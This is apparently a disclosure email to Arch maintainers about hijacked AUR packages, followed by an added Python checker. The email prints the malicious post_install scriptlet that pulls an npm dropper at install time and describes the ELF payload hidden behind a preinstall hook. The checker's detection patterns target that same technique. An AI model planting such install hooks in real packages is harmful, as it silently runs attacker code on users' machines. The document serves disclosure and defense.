Hi Arch Team,

Flagging an active coordinated supply-chain attack against the AUR observed on 2026-05-16 / 2026-05-17. Three packages were adopted by three single-package burner accounts using @onionmail.org addresses, and the very first commit on each pushed an identical payload.

Hijacked packages and adopters

  AUR Package     Adopter           Email
  mod_python      Arthur Nicolas    [email protected]
  nss-hg          Raphael David     [email protected]
  multibootusb    Francis Martin    [email protected]

Common payload

Added to / inserted in each package's .install scriptlet:

  post_install() {
    cd /tmp
    npm install python-utils
  }

Each PKGBUILD also gained a new depends=('npm') to make sure the npm binary is present at install time.

Dropper

The npm package [email protected], published on 2026-05-16 by generaltranslations <[email protected]> (impersonating the legitimate generaltranslation/gt org on GitHub, which actually publishes python-extractor, not python-utils), declares:

  "preinstall": "./dist/typecheck.js"

in its package.json. That file is not JavaScript: it is a UPX-packed, statically-linked Linux x86-64 ELF executable, ~5.2 MB.

  * SHA-256: cafebcfe50f4d6ed218f4525f44b81654bf2df4ebb06918984b4257940d4fd5b
  * Strings include a hardcoded callout endpoint 207.90.194.2:443 which is a TOR exit.

Best Regards,
Soufiane Fariss
[email protected]
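Two checks a packager or repo maintainer could run against the tell-tales in the report above (an npm lifecycle hook whose target is a native ELF binary rather than JavaScript, and a pacman .install scriptlet that calls npm). This is added example code, not part of the original mail or of any Arch tooling; the sample manifest, the fake ELF bytes and the scriptlet text are constructed in-line.

```python
import json
import re

ELF_MAGIC = b"\x7fELF"
UPX_MARKER = b"UPX!"
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Matches "npm install ...", "npm i ..." or "npm add ..." inside a scriptlet.
NPM_INSTALL_RE = re.compile(r"\bnpm\s+(?:install|i|add)\b")


def classify_blob(data: bytes) -> str:
    """Label a file by its content, not by its extension (.js can hide an ELF)."""
    if data.startswith(ELF_MAGIC):
        return "elf-upx" if UPX_MARKER in data else "elf"
    if data.startswith(b"#!"):
        return "shebang-script"
    return "text"


def audit_npm_manifest(manifest_json: str, files: dict) -> list:
    """Flag lifecycle hooks whose bundled target is a native binary.

    `files` maps package-relative paths to raw bytes, so this works on an
    unpacked tarball as well as on the constructed data below."""
    scripts = json.loads(manifest_json).get("scripts", {})
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        target = cmd.split()[0].removeprefix("./")
        if target not in files:
            continue  # e.g. "node setup.js": the interpreter is not a bundled file
        kind = classify_blob(files[target])
        if kind.startswith("elf"):
            findings.append(f"{hook} -> {target}: native {kind} binary, not JavaScript")
    return findings


def audit_install_scriptlet(text: str) -> list:
    """Flag pacman .install hooks that reach out to npm at install time."""
    return [f"scriptlet runs npm: {ln.strip()}"
            for ln in text.splitlines() if NPM_INSTALL_RE.search(ln)]


# Constructed samples: a manifest like the one in the report, a stand-in blob
# carrying the ELF magic plus a UPX marker, and the reported post_install().
SAMPLE_MANIFEST = json.dumps({"name": "constructed-example", "version": "0.0.1",
                              "scripts": {"preinstall": "./dist/typecheck.js"}})
SAMPLE_FILES = {"dist/typecheck.js": ELF_MAGIC + b"\x02\x01\x01" + b"\0" * 64 + UPX_MARKER}
SAMPLE_INSTALL = "post_install() {\n  cd /tmp\n  npm install python-utils\n}\n"

if __name__ == "__main__":
    for finding in audit_npm_manifest(SAMPLE_MANIFEST, SAMPLE_FILES) + audit_install_scriptlet(SAMPLE_INSTALL):
        print(finding)
```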
